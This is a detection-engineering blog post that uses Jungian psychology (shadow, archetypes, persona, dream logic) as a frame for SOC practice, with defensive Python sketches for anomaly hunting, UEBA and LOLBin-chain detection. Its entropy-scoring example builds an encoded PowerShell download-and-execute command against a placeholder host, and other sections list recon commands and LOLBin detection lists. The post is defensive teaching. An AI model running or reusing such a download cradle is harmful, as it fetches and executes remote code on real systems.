“Invoke-Shadow” — Applying Jungian Psychology to Detection Engineering
“Until you make the unconscious conscious, it will direct your life — and you will call it fate.” — Carl Jung
Before I begin this very odd post, let me be clear — even I’m not sure what I’ve come up with. The idea actually came to me in a dream I could hardly remember.
I’ve always been drawn to weird analogies in cybersecurity — those odd, left-field comparisons that somehow unlock new ways of thinking about detection engineering. I even tried writing a post about the relationship between music theory and detection logic, but it didn’t quite land the way I hoped. And then… this came up.
As I followed the thread of my dream, I started thinking about the work of Carl Jung, the brilliant, ahead-of-his-time Swiss psychoanalyst who believed that human behavior follows deep patterns — unconscious, symbolic, archetypal. That we all carry within us a “shadow self,” that our dreams are not nonsense but messages wrapped in metaphor, and that beneath the surface, we share a collective unconscious of motifs and instincts. Then I realized… attackers often behave the same way.
Advanced threat actors don’t always operate in straightforward, logical patterns. They move nonlinearly, they hide intent behind symbols, they weave behavior that feels chaotic, disjointed, or even absurd — like dreams. They evade us not just by breaking rules, but by breaking the logic we expect.
And maybe that’s the point.
So in this potentially near-schizophrenic post, I want to explore what it means to analyze threat behavior the way Jung analyzed dreams, archetypes, and the unconscious. This won’t be a typical threat intel write-up — and it’s definitely not a textbook psychology essay. It’s a dive into what happens when you gaze at telemetry long enough that the telemetry starts to gaze back at you, and myth, motive, and metaphor begin to emerge.
This post explores how Jungian concepts can reshape the way we do detection engineering — not as metaphor, but as a practical, tactical model for:
- Writing better detection rules
- Understanding attacker behavior
- Building mature, adaptive SOCs
- Seeing the unseen in your environment
Let’s get weird.
🌒 1. The Shadow → Detecting What No One Claims
The shadow is everything that the individual refuses to acknowledge about themselves.
In Jungian psychology, the shadow represents the parts of ourselves we repress, deny, or simply don’t see. It’s the unacknowledged self — often messy, hidden, or inconvenient. Psychological literature and self-reflection teach us that if you repress something for long enough, it tends to erupt in destructive ways.
But the shadow isn’t evil — it’s just unknown.
In cybersecurity, the “shadow” takes many forms:
- Processes that run regularly, but no one knows why
- Admin accounts no one owns
- Scripts in Startup folders from ex-employees
- Scheduled tasks created “by someone, years ago”
These artifacts aren’t necessarily malicious — but they operate outside collective awareness, and that makes them dangerous. Your goal? Bring them into the light.
We ignore them because they don’t throw alerts — but they still have access, run code, and persist.
These are not IOCs. They are psychological blind spots in infrastructure.
🧪 Detection Concept: Shadow Analytics
Use your EDR or SIEM to ask:
- Which accounts haven’t logged in for 90 days — but still exist?
- Which binaries have executed more than 5× but have no publisher or digital signature?
- What registry keys are set on 80% of endpoints, but not in any deployment baseline?
You’re not hunting malware.
You’re surfacing the unconscious behaviors of your network.
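Here is a minimal sketch of those three questions in code, assuming you can export accounts, process events, and registry values from your SIEM/EDR as CSV. The column names (account, last_logon, signer, and so on) are placeholders for whatever your schema actually calls them, and timestamps are assumed to be naive UTC:

```python
# A minimal "shadow analytics" sketch over exported telemetry.
import pandas as pd

NOW = pd.Timestamp.now()

# 1. Accounts that still exist but haven't logged in for 90+ days.
accounts = pd.read_csv("accounts.csv", parse_dates=["last_logon"])
stale = accounts[accounts["last_logon"] < NOW - pd.Timedelta(days=90)]

# 2. Binaries executed more than 5 times with no publisher / signature.
procs = pd.read_csv("process_events.csv")  # image, signer, host, ...
frequent_unsigned = (
    procs[procs["signer"].isna()]
    .groupby("image")
    .size()
    .reset_index(name="executions")
    .query("executions > 5")
)

# 3. Registry keys present on >80% of endpoints but absent from the baseline.
reg = pd.read_csv("registry_values.csv")  # key, host
baseline = set(pd.read_csv("deployment_baseline.csv")["key"])
coverage = reg.groupby("key")["host"].nunique() / reg["host"].nunique()
shadow_keys = coverage[(coverage > 0.8) & ~coverage.index.isin(baseline)]

print(stale[["account", "last_logon"]])
print(frequent_unsigned)
print(shadow_keys.sort_values(ascending=False))
```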
🧬 2. Archetypes → Behavioral TTP Templates
Archetypes are the universal, archaic patterns and images that derive from the collective unconscious.
Carl Jung believed that human behavior isn’t random — it follows deep, universal patterns called archetypes. These are timeless roles we instinctively recognize: the Hero, the Trickster, the Magician, the Fool.
Sound familiar?
We already use something similar: the MITRE ATT&CK framework. It’s nothing short of amazing how advances in different fields often have their roots in universal behavior and thinking patterns — like a “super intelligence” that affects all of our technological breakthroughs.
Each MITRE technique is a behavioral archetype — a template. Script execution (T1059) is a Magician casting a spell. Obfuscation (T1027) is the Trickster playing a shell game.
But here’s the next step:
What if detection rules weren’t built for IOCs, but for archetypes of attacker behavior?
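To make that concrete, here is a hypothetical sketch of a rule written against behavior rather than indicators. The event fields (process, parent, cmdline) and the specific predicates are illustrative, not tied to any product:

```python
# Hypothetical sketch: a detection "archetype" described as behavior,
# not as hashes or domains. Fields and predicates are illustrative only.
from dataclasses import dataclass, field


@dataclass
class Archetype:
    name: str
    predicates: list = field(default_factory=list)  # behavioral checks, not IOC lists

    def matches(self, event: dict) -> bool:
        return all(p(event) for p in self.predicates)


MAGICIAN = Archetype(
    name="Magician (scripted execution, T1059)",
    predicates=[
        lambda e: e.get("process", "").lower() in {"powershell.exe", "wscript.exe", "cscript.exe"},
        lambda e: ("-enc" in e.get("cmdline", "").lower()
                   or "frombase64string" in e.get("cmdline", "").lower()),
        lambda e: e.get("parent", "").lower() not in {"explorer.exe"},  # indirect launch
    ],
)

event = {
    "process": "powershell.exe",
    "parent": "winword.exe",
    "cmdline": "powershell.exe -enc SQBFAFgA...",
}
print(MAGICIAN.matches(event))  # True: the behavior fits the archetype
```

The rule never names a hash or a domain; it names a pattern of behavior, which is the whole point of the archetype idea.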

🔄 3. Individuation → SOC Maturity Through Integration
Individuation is the process of integrating the conscious and unconscious.
In Jungian thought (and echoed by Joseph Campbell’s Hero’s Journey), true growth comes not from staying safe, but from leaving the known world, confronting what’s hidden, and returning transformed.

That’s exactly what SOC maturity looks like.
A young SOC begins in the Ordinary World — basic rules, reactive alerts, fragmented telemetry. Then something triggers the journey: a breach, an audit, or the realization that detection coverage is mostly guesswork.
From there, the SOC enters the unknown:
- Parsing obscure logs
- Dealing with alert fatigue
- Correlating across systems
- Building its first threat hunts
This is the Initiation Phase — messy, nonlinear, full of friction. But through it, the SOC begins to develop its inner structure — integrating identity, behavior, time, and context into a deeper detection narrative.
Eventually, it returns to the “real world” as something more complete: Not a rule factory, but a system that can see across silos, adapt to threats, and detect intent, not just artifacts.
This is individuation: the SOC’s transformation into a whole, context-aware defender. Not just alerting — but understanding. The logs were always there. The story just needed a reader.
🌌 4. The Collective Unconscious → Shared Expertise
The collective unconscious contains the whole spiritual heritage of mankind’s evolution.
Carl Jung’s idea of the collective unconscious is the concept that all humans inherit a deep reservoir of universal knowledge, instincts, and symbols — a kind of shared psychic blueprint we all draw from, even if we don’t realize it.
In cybersecurity, we tap into our own version of this every day:
- Sigma rules shared on GitHub
- Threat intel feeds
- YARA repositories
- ATT&CK mappings
- Incident reports from other orgs
- The vast amount of knowledge and expertise shared on blogs and X (formerly Twitter)
This is the collective unconscious of defenders — a pool of accumulated expertise, intuition, and behavioral understanding passed between teams, orgs, and generations of analysts.
But Jung would say: “That’s only the first step.”
To be useful, the archetypes from the collective unconscious must be made conscious — adapted to local context.
Don’t just copy Sigma rules — instantiate them.
Tune them for your logs, your tooling, your threats.
Just as the “Hero” archetype shows up differently in every story, the same behavior (T1059.001, PowerShell) looks different in:
- A small org with no PowerShell logging
- A large enterprise with full telemetry
- An air-gapped ICS network
The archetype is shared. The expression must be individualized.
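As a rough illustration, here is one way to “instantiate” a shared rule for different environments. The base rule is a simplified, Sigma-flavored Python structure (not drop-in Sigma YAML), and the per-environment tweaks are examples of local tuning:

```python
# Sketch of instantiating a shared detection archetype for your own context.
import copy

BASE_RULE = {
    "title": "Suspicious PowerShell (T1059.001)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["-enc", "IEX", "DownloadString"],
        },
        "condition": "selection",
    },
    "falsepositives": [],
}


def instantiate(rule: dict, **local) -> dict:
    """Copy the shared archetype and overlay local context."""
    r = copy.deepcopy(rule)
    r["falsepositives"].extend(local.get("known_good", []))
    if local.get("logsource"):
        r["logsource"].update(local["logsource"])
    return r


# Large enterprise: Sysmon everywhere, SCCM scripts are expected noise.
enterprise = instantiate(
    BASE_RULE,
    logsource={"service": "sysmon"},
    known_good=["SCCM client health scripts"],
)

# Small org without script-block logging: fall back to 4688 process events.
small_org = instantiate(BASE_RULE, logsource={"service": "security"})
```

The syntax is not the point; the point is that the shared archetype stays intact while its local expression changes.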
👤 5. The Persona → UEBA and Identity Drift
The persona is the mask one wears in society.
In Jungian psychology, the persona is the mask we wear to function in society. It’s the curated version of ourselves we show the world — adapted to expectations, roles, and norms. But underneath it lies the true self — more complex, sometimes contradictory, and not always aligned with the mask.
In cybersecurity, every user account operates with its own persona:
- Work hours
- Device usage
- Access patterns
- Application behavior
But when attackers compromise a user account (or an insider goes rogue), that mask slips. Therefore:
- Monitor for sudden privilege use
- Watch for geographic impossibilities
- Track time-of-day anomalies
- Detect tooling inconsistencies (PowerShell use by a non-technical persona)
This is identity drift — when the persona fractures, and true intent leaks through. UEBA (User and Entity Behavior Analytics) is a technical expression of this Jungian idea: tracking when a digital identity stops behaving like itself.
In detection, your job is to spot when the mask slips, because attackers don’t always bring new tools. Sometimes, they just borrow your face.
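A toy sketch of what that looks like in code: compare an event against a per-user baseline and count how many facets of the persona it violates. The baseline, features, and scoring are illustrative; a real UEBA product learns these from historical telemetry rather than hard-coding them:

```python
# Minimal "identity drift" sketch: how far does this event stray from the persona?
# Hypothetical baseline built from ~90 days of history per user.
baseline = {
    "alice": {
        "hours": range(8, 19),
        "hosts": {"WS-ALICE"},
        "tools": {"outlook.exe", "excel.exe", "chrome.exe"},
    },
}


def drift_score(user: str, event: dict) -> int:
    """Count how many facets of the persona this event violates."""
    b = baseline.get(user)
    if b is None:
        return 0  # no persona yet, so nothing to drift from
    score = 0
    if event["hour"] not in b["hours"]:
        score += 1  # time-of-day anomaly
    if event["host"] not in b["hosts"]:
        score += 1  # new or unexpected host
    if event["process"].lower() not in b["tools"]:
        score += 1  # tooling inconsistency
    return score


event = {"hour": 3, "host": "DC01", "process": "powershell.exe"}
print(drift_score("alice", event))  # 3 -> the mask has slipped
```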
🧠 Behavioral Profiling in Detection Through Attacker Psychology
What if you could infer an attacker’s psychological profile by the way they move through an environment?
Not attribution.
Not OPSEC fails.
But something more human:
- Are they careful?
- Are they arrogant?
- Are they creative?
- Are they chaotic or methodical?
Just like law enforcement creates behavioral profiles of serial offenders based on choice of tools, victim selection, time of attack and clean-up behaviors, we can do the same using detection telemetry.
Let’s map a few example attacker behaviors to psychological profiles you can infer from detection data (a rough scoring sketch follows the profiles).
👻 The Phantom
Low ego, high stealth, extremely cautious. Catch them through anomaly detection, not static matching. Their silence is the signal.
- Prefers LOLBins
- Uses encoded commands and minimal file drops
- Rarely runs tools as SYSTEM
- Relies on existing access/persistence
- Leaves minimal traces in the environment
🦍 The Brute
Loud, fast, and doesn’t care. Easy to detect — but the danger is speed, not stealth. Alert fast, isolate faster.
- Uses obvious, well-signatured tooling
- Operates with SYSTEM privileges from the start
- Tries multiple lateral movement techniques in short bursts
- Clears logs sloppily
🎯 The Hunter
Focused, persistent, and exploratory. Flag recon commands outside red team windows. Look for correlated use of net, dsquery, nltest, SharpHound, etc.
- Performs deep recon: AD enumeration, GPO checks, user session review
- Slow, methodical credential access
- Operates during business hours to blend in
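To show the shape of the idea (and nothing more), here is a toy scorer that tallies a session’s events against the three profiles above. The signal lists and weights are guesses for illustration, not a validated model:

```python
# Rough sketch: score a session's events against the Phantom / Brute / Hunter profiles.
LOLBINS = {"mshta.exe", "rundll32.exe", "certutil.exe", "regsvr32.exe", "wmic.exe"}
RECON = {"net.exe", "dsquery.exe", "nltest.exe", "sharphound.exe", "whoami.exe"}
NOISY = {"mimikatz.exe", "psexec.exe"}


def profile_session(events: list[dict]) -> dict:
    scores = {"phantom": 0, "brute": 0, "hunter": 0}
    for e in events:
        proc = e.get("process", "").lower()
        cmd = e.get("cmdline", "").lower()
        if proc in LOLBINS or "-enc" in cmd:
            scores["phantom"] += 1  # quiet, living off the land
        if proc in NOISY or e.get("user") == "SYSTEM":
            scores["brute"] += 1    # loud, privileged, well-signatured
        if proc in RECON:
            scores["hunter"] += 1   # methodical enumeration
    return scores


session = [
    {"process": "net.exe", "cmdline": 'net group "domain admins" /domain', "user": "j.doe"},
    {"process": "nltest.exe", "cmdline": "nltest /dclist:", "user": "j.doe"},
]
print(profile_session(session))  # {'phantom': 0, 'brute': 0, 'hunter': 2}
```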

Every script, command line, and scheduled task is an expression of attacker intent:
- The fast ones are potentially insecure
- The quiet ones are scared — or practiced
- The clever ones want to be admired, even in silence.
We don’t just detect behavior. We profile it, we understand it, and we make the unconscious conscious.
Just like Jung would have wanted. 🧘🏽♂️💻
🌙 Dream Logic in Threat Behavior: Understanding Deception Through a Jungian Lens
“The dream is a little hidden door in the innermost and most secret recesses of the soul.”
In traditional cybersecurity detection, we rely on logic. Cause and effect. Parent and child. Input and output. However, some advanced attackers play by dream logic.
- They chain unrelated tools together
- They obfuscate intent behind absurdity
- They leave artifacts that don’t make sense — or make TOO MUCH sense
- They move through environments like dreams move through scenes — disjointed, nonlinear, symbolic
In Jungian terms, dream logic isn’t nonsense — it’s nonlinear, symbolic, and emotionally charged. In dreams:
- Things appear in the wrong place, but make emotional sense
- Symbols stand in for complex fears or desires
- Time, causality and identity are fluid
- Discontinuity is normal and meaningful
Translated to attacker behavior:
- A legitimate system tool used for an absurd purpose
- File paths that reference random, fake software
- Payloads that trigger from clipboard, wallpaper settings, or .lnk metadata
- LOLBins launching one another in recursive chains (a detection sketch for this one follows below)
That’s not broken logic. That’s deceptive logic — dream logic.
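That last bullet, LOLBins launching one another, is one of the easier dream-logic patterns to hunt for. A minimal sketch, assuming Sysmon-style process creation events with pid, ppid, and image fields:

```python
# Walk a process tree and flag chains where LOLBins spawn other LOLBins.
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "wscript.exe"}


def lolbin_chains(events: list[dict], min_depth: int = 2) -> list[list[str]]:
    by_pid = {e["pid"]: e for e in events}
    chains = []
    for e in events:
        chain, cur = [], e
        while cur and cur["image"].lower() in LOLBINS:
            chain.append(cur["image"])
            cur = by_pid.get(cur["ppid"])
        if len(chain) >= min_depth:
            chains.append(list(reversed(chain)))  # parent -> child order
    return chains


events = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "mshta.exe"},
    {"pid": 300, "ppid": 200, "image": "rundll32.exe"},
]
print(lolbin_chains(events))  # [['mshta.exe', 'rundll32.exe']]
```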

Just like in dreams, the things that seem too perfect — too mundane — might be hiding something deeper.
Is that scheduled task really from Dell Update Assistant?
Is that registry key really supposed to be named OneDriveUpgradeCheck?
They may be symbols, not facts.
Attackers use dream logic because:
- It breaks linear analysis
- It hides payloads in symbols
- It disorients both analysts and detection systems
To counter it, we must become analysts of dreams — parsing out intent not just from commands, but from the storyline, the symbolism, and the structure of deception.
Detection is not just pattern matching.
It’s mythology, narrative, psychology, and intuition.
Fun idea — Detection Archetypes as Cards:
────────────────────────────────────
🃏 THE TRICKSTER
────────────────────────────────────
A master of deception. Changes form, evades detection, hides in known places.
🎯 Associated TTPs:
- T1027: Obfuscated Files or Information
- T1140: Deobfuscate/Decode Files or Information
- T1218: System Binary Proxy Execution
🧪 Common Tools:
- mshta.exe
- rundll32.exe
- certutil.exe
- regsvr32.exe
🛡 Detection Tips:
- Look for LOLBins with long, encoded command lines
- Detect mismatched parent/child execution chains
- Use entropy scoring on script contents
🔍 Behavior Profile:
- Indirect execution
- Short lifetime processes
- Often chains multiple LOLBins in sequence
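The entropy-scoring tip from the card is quick to prototype. A minimal Shannon-entropy sketch over command lines; the sample strings are made up, and any fixed cut-off should be tuned against your own baseline:

```python
# Score command lines (or script contents) by Shannon entropy.
import base64
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text`."""
    counts = Counter(text)
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


plain = "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"
encoded = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')".encode("utf-16-le")
).decode()

for cmd in (plain, encoded):
    print(f"{shannon_entropy(cmd):.2f} bits/char  {cmd[:60]}")
# Encoded blobs usually score noticeably higher than plain command lines;
# pick a cut-off (and a minimum-length floor) that fits your environment.
```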
Final Reflection: Jung for the SOC
The SOC is not a static engine. It is a living psyche.
If we listen to our environments like Jung listened to dreams, we can:
- Detect the shadow behavior our tools miss
- Recognize archetypal patterns across attacker playbooks
- Mature our capabilities through integration and individuation
- Use the collective unconscious as shared knowledge — not copy-paste
- Spot identity drift when users break from their roles

Further Reading
- My Notion page HERE. Feel free to send me any further links you think fit 🙂
- My Medium reading list.
- I recommend starting HERE.
If you enjoyed the article, feel free to connect with me!
https://www.linkedin.com/in/daniel-koifman-61072218b/
https://x.com/KoifSec
https://koifsec.medium.com/